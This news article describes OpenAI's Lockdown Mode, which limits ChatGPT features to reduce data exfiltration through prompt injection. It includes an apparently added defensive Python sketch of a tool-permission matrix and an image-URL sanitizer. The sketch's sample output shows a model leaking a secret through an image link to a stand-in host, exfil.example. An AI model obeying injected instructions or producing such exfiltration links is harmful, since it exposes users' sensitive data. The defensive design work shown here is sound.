OpenAI unveils Lockdown Mode to protect sensitive data from prompt injection attacks
OpenAI has introduced "Lockdown Mode" to enhance protection against prompt injection attacks, which subtly embed malicious instructions in web content. This feature restricts advanced functionalities like live web browsing and deep research, aiming to safeguard sensitive data for high-risk users. The company acknowledges that even with Lockdown Mode, some vulnerabilities may persist, primarily in cached content or uploaded files.
OpenAI has launched "Lockdown Mode," a new feature designed to counter prompt injection attacks. These attacks involve embedding malicious instructions within web pages and other digital content sources, potentially compromising chatbot interactions. The new mode restricts several advanced functionalities within ChatGPT to mitigate these risks.
Specifically, Lockdown Mode disables live web browsing, limiting access to only cached content. It also prevents the retrieval and display of images from the web, though image generation remains possible. Additionally, deep research capabilities and the agent mode are deactivated to further reduce exposure to malicious prompts.
OpenAI notes that while Lockdown Mode significantly enhances security, it doesn't eliminate all prompt injection vulnerabilities. Attacks could still originate from cached web content or uploaded files, potentially influencing the chatbot's behavior or accuracy. The primary goal is to minimize the chances of sensitive data being inadvertently shared or compromised during interactions.
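The restrictions described above amount to a capability policy: some tools are switched off outright, others (cached content, uploaded files, image generation) stay available, and the model's output must not be able to pull from the web. The following Python sketch is an added illustration of that pattern for a generic assistant harness; it is not OpenAI's code or API, and the tool names, the `Mode` enum and the sample output are assumptions constructed for the example. It shows the allow/deny matrix with deny-by-default for unknown tools, plus the output-side check that strips remote image references in lockdown mode, since a rendered image URL is the usual way injected instructions smuggle data out.

```python
"""Capability gate and output sanitizer modelled on the restrictions the article lists.
Added example; tool names and modes are hypothetical, not an OpenAI interface."""
from dataclasses import dataclass
from enum import Enum
import re


class Mode(Enum):
    NORMAL = "normal"
    LOCKDOWN = "lockdown"


# Hypothetical tool identifiers. The LOCKDOWN column mirrors the article: live browsing,
# web image retrieval, deep research and agent mode off; cache, uploads and image
# generation still on.
TOOL_POLICY = {
    "web.search_live":  {Mode.NORMAL: True, Mode.LOCKDOWN: False},
    "web.fetch_cached": {Mode.NORMAL: True, Mode.LOCKDOWN: True},
    "web.fetch_image":  {Mode.NORMAL: True, Mode.LOCKDOWN: False},
    "image.generate":   {Mode.NORMAL: True, Mode.LOCKDOWN: True},
    "research.deep":    {Mode.NORMAL: True, Mode.LOCKDOWN: False},
    "agent.run":        {Mode.NORMAL: True, Mode.LOCKDOWN: False},
    "file.read_upload": {Mode.NORMAL: True, Mode.LOCKDOWN: True},
}


@dataclass
class Decision:
    allowed: bool
    reason: str


def authorize_tool(mode: Mode, tool: str) -> Decision:
    """Consult the matrix; anything not listed is denied regardless of mode."""
    policy = TOOL_POLICY.get(tool)
    if policy is None:
        return Decision(False, f"unknown tool {tool!r} denied by default")
    if policy[mode]:
        return Decision(True, f"{tool} permitted in {mode.value} mode")
    return Decision(False, f"{tool} disabled in {mode.value} mode")


# Markdown image syntax pointing at a remote host. A renderer that fetches this URL
# sends the query string along with it, which is why web images are cut in lockdown.
REMOTE_IMAGE_MD = re.compile(r"!\[[^\]]*\]\((https?://[^)\s]+)\)")


def sanitize_output(mode: Mode, text: str) -> tuple[str, list[str]]:
    """In lockdown mode, replace remote image markdown and return the URLs removed."""
    if mode is not Mode.LOCKDOWN:
        return text, []
    removed = REMOTE_IMAGE_MD.findall(text)
    cleaned = REMOTE_IMAGE_MD.sub("[remote image removed]", text)
    return cleaned, removed


def run_turn(mode: Mode, tool_calls: list[str], model_output: str) -> dict:
    """Apply both checks to one assistant turn and report what was blocked."""
    denied = [t for t in tool_calls if not authorize_tool(mode, t).allowed]
    cleaned, removed_urls = sanitize_output(mode, model_output)
    return {"denied_tools": denied, "output": cleaned, "removed_urls": removed_urls}


# Constructed sample: model output that an injected instruction steered into leaking
# a value through an image URL.
SAMPLE_OUTPUT = (
    "Here is the summary you asked for.\n"
    "![status](https://exfil.example/pixel.png?q=SECRET)\n"
)

if __name__ == "__main__":
    result = run_turn(Mode.LOCKDOWN, ["web.search_live", "web.fetch_cached"], SAMPLE_OUTPUT)
    print(result)
```

The matrix alone does not address the residual risk the article names: cached pages and uploaded files still reach the model as text, so instructions inside them can still shape its answers. The output-side check narrows what such instructions can achieve, which is the point of combining the two.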
Lockdown Mode is not intended for all users. It is specifically designed for individuals and organizations that handle highly sensitive data and require stringent protection against data exfiltration risks associated with prompt injection. The feature aims to provide an additional layer of security for these high-stakes environments.
Currently, OpenAI is rolling out Lockdown Mode to self-serve ChatGPT Business accounts and eligible personal accounts. This phased deployment ensures that users with the greatest need for enhanced security can access these protections first, reinforcing data integrity for critical operations.
